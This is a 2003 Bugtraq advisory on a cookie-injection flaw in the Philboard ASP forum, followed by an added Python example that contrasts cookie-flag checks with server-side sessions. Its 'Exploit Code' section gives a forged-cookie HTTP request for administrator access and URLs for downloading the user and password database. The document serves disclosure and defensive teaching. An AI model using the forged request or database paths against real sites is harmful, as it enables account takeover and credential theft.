[30292] in bugtraq
Philboard Forum Vulnerability
daemon@ATHENA.MIT.EDU (aresu@bosen.net)
Fri May 30 02:19:56 2003
Message-ID: <1054198125.3ed5c96d45e59@webmail.bosen.net>
Date: Thu, 29 May 2003 15:48:45 +0700
From: aresu@bosen.net
To: bugtraq@securityfocus.com
X-Errot-Report-To: Agus Supriadhie <bosen@antionline.org>
Philboard Vulnerability
Severity : High (Possible to gain administrator/user access on the forum board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status : Vendor contacted, fixed version is not available (because they didn't
respond)
Author : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
and All 1ndonesian Security Team (1st)
#romance@centrin.net.id
http://www.bosen.net/releases/
Summary
=======
Philboard is a freeware forum application written as ASP scripts.
The vulnerability is in the cookie management; almost every script is vulnerable
to cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"
Acknowledgments
===============
Vulnerability discovery and advisory by AresU
Vendor Response
===============
Vendor has been contacted and a fixed version is not available (because they
didn't respond).
To fix the script, you must change every cookie command into a session command.
Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;
2) Download the database (users and password):
Usually, the database can be found and downloaded from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
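The fix named in the advisory (replace cookie checks with session checks), modelled as an added example; this is not Philboard's code and not part of the original message. It is written in Python rather than ASP, and the function names, the "sid" cookie name and the sample accounts are assumptions made for illustration.

```python
import secrets
from http.cookies import SimpleCookie

# Server-side session store: session id -> attributes. Only the server writes it.
SESSIONS = {}

# Constructed sample accounts (hypothetical; real code would store password hashes).
ACCOUNTS = {
    "moderator": {"password": "example-only", "admin": True},
    "guest": {"password": "guest-pass", "admin": False},
}

def parse_cookies(header):
    """Parse a Cookie request header into a plain dict."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}

def is_admin_cookie_flag(cookie_header):
    """Pattern described in the advisory: the role flag is read from the
    client-supplied cookie, so whoever sends the header decides the answer."""
    return parse_cookies(cookie_header).get("philboard_admin") == "True"

def login(username, password, accounts=ACCOUNTS):
    """Verify credentials, then record the role server-side under a random id."""
    account = accounts.get(username)
    if account is None or not secrets.compare_digest(account["password"], password):
        return None
    sid = secrets.token_urlsafe(32)  # unguessable, carries no meaning itself
    SESSIONS[sid] = {"user": username, "admin": account["admin"]}
    return sid  # the only value sent to the browser

def is_admin_session(cookie_header):
    """Session pattern: the cookie holds only an opaque id; the role is looked
    up in server-side state, and any role flag in the cookie is ignored."""
    sid = parse_cookies(cookie_header).get("sid", "")
    return SESSIONS.get(sid, {}).get("admin", False) is True

if __name__ == "__main__":
    header = "philboard_admin=True;"  # header value quoted in the advisory
    print("cookie-flag check :", is_admin_cookie_flag(header))
    print("session check     :", is_admin_session(header))
    sid = login("moderator", "example-only")
    print("after real login  :", is_admin_session("sid=" + sid))
```

The same rule applies to every script that makes an access decision: the decision must come from state the server wrote after authentication, never from a value the request supplies.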